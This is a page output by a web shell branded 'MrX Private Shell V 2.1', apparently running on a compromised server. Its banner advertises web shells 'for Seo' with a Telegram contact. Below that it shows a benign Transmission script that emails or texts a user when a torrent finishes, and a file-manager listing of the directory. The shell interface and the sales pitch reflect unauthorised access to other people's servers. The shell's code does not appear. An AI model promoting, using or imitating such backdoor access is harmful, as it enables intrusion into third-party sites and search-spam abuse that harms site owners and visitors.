__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/bin/sh ## ## User-configurable Variables ## # Where "nail" is installed on your system. # We need this to actually send the mail, so make sure it's installed NAIL=/usr/bin/nail # REQUIRED CHANGE #1: you must set SMTP_SERVER # http://www.host45.com/resources/ispsmtps.php has a list of ISP's smtp servers SMTP_SERVER=your.smtp.server # REQUIRED CHANGE #2: you must set your email address. # option A: change "[email protected]" here and remove the leading '#' to # use a real email address #[email protected] # # option B: for an SMS message, set your phone number here and remove the # leading '#' on the PHONENUM line and your phone provider's TO_ADDR line #PHONENUM="1234567890" #TO_ADDR="[email protected]" # SMS: Alltel #TO_ADDR="[email protected]" # SMS: AT&T (formerly Cingular) #TO_ADDR="[email protected]" # SMS: Boost Mobile #TO_ADDR="[email protected]" # SMS: Cricket Wireless #TO_ADDR="[email protected]" # SMS: Nextel (Sprint Nextel) #TO_ADDR="[email protected]" # SMS: Sprint (Sprint Nextel) #TO_ADDR="[email protected]" # SMS: T-Mobile #TO_ADDR="[email protected]" # SMS: Verizon #TO_ADDR="[email protected]" # SMS: Virgin Mobile USA #TO_ADDR="[email protected]" # SMS: Bell Canada #TO_ADDR="[email protected]" # SMS: Centennial Wireless #TO_ADDR="[email protected]" # SMS: Cellular Sout #TO_ADDR="[email protected]" # SMS: Cincinnati Bell #TO_ADDR="[email protected]" # SMS: Metro PCS 1 #TO_ADDR="[email protected]" # SMS: Metro PCS 2 #TO_ADDR="[email protected]" # SMS: Quest #TO_ADDR="[email protected]" # SMS: Rogers #TO_ADDR="[email protected]" # SMS: Suncom #TO_ADDR="[email protected]" # SMS: Telus #TO_ADDR="[email protected]" # SMS: U.S. Cellular ### ### Send the mail... ### SUBJECT="Torrent Done!" FROM_ADDR="[email protected]" TMPFILE=$(mktemp -t transmission.XXXXXXXXXX) echo "Transmission finished downloading \"$TR_TORRENT_NAME\" on $TR_TIME_LOCALTIME" > "$TMPFILE" $NAIL -v -S from="$FROM_ADDR" -S smtp -s "$SUBJECT" -S smtp=$SMTP_SERVER "$TO_ADDR" < "$TMPFILE" rm "$TMPFILE"
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| news | Folder | 0755 |
|
|
| AUTHORS | File | 3.25 KB | 0644 |
|
| README.md.gz | File | 1.7 KB | 0644 |
|
| changelog.Debian.gz | File | 2.9 KB | 0644 |
|
| copyright | File | 12.41 KB | 0644 |
|
| rpc-spec.md.gz | File | 9.74 KB | 0644 |
|
| send-email-when-torrent-done.sh | File | 2.31 KB | 0644 |
|